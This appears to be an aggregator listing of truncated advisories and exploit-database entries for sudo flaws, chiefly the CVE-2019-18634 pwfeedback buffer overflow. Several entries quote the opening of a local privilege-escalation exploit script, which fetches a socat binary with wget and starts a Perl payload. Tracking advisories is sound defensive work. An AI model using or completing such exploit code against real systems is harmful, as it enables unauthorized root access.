Important: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is...

RHEL 8 : sudo (RHSA-2020:0487)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0487 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

RHEL 8 : sudo (RHSA-2020:0509)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0509 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

Exploit for Out-of-bounds Write in Sudo_Project Sudo

PoC exploit for CVE-2019-18634, a vulnerability in the Sudo pack...

MGASA-2020-0081 Updated sudo packages fix security vulnerability

The updated packages fix a security vulnerability: In Sudo before 1.8.31, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for...

Updated sudo packages fix security vulnerability

The updated packages fix a security vulnerability: In Sudo before 1.8.31, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for...

Exploit for Out-of-bounds Write in Sudo_Project Sudo

CVE-2019-18634 :warning: This code has only been tested on...

CVE-2020-7954

An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs e.g. nmap without the need for a...

Design/Logic Flaw

An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs e.g. nmap without the need for a...

[ASA-202002-2] sudo: privilege escalation

Arch Linux Security Advisory ASA-202002-2 ========================================= Severity: High Date : 2020-02-06 CVE-ID : CVE-2019-18634 Package : sudo Type : privilege escalation Remote : No Link : https://security.archlinux.org/AVG-1093 Summary ======= The package sudo before version 1.8.31...

Sudo 1.8.25p - pwfeedback Buffer Overflow

Sudo 1.8.25p - pwfeedback Buffer Overflow !/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag =...

Sudo 1.8.25p - 'pwfeedback' Buffer Overflow

!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...

USN-4263-2 sudo vulnerability

USN-4263-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. Original advisory details: Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibl...

USN-4263-2: Sudo vulnerability

USN-4263-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. Original advisory details: Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibl...

Sudo 1.8.25p - (pwfeedback) Buffer Overflow Exploit

!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...

RHEL 8 : sudo (RHSA-2020:0388)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0388 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

sudo: Privilege escalation via 'Runas' specification with 'ALL' keyword

A flaw was found in the way sudo implemented running commands with arbitrary user ID. If a sudoers entry is written to allow the attacker to run a command as any user except root, this flaw can be used by the attacker to bypass that restriction...

Important: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is...

Ubuntu 16.04 LTS / 18.04 LTS : Sudo vulnerability (USN-4263-1)

The remote Ubuntu 16.04 LTS / 18.04 LTS host has packages installed that are affected by a vulnerability as referenced in the USN-4263-1 advisory. Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibly use this...

Sudo 1.8.25p Buffer Overflow

Title: Sudo 1.8.25p - Buffer Overflow Date: 2020-01-30 Author: Joe Vennix Software: Sudo Versions: Sudo versions prior to 1.8.26 CVE: CVE-2019-18634 Reference: https://www.sudo.ws/alerts/pwfeedback.html Sudo's pwfeedback option can be used to provide visual feedback when the user is inputting the...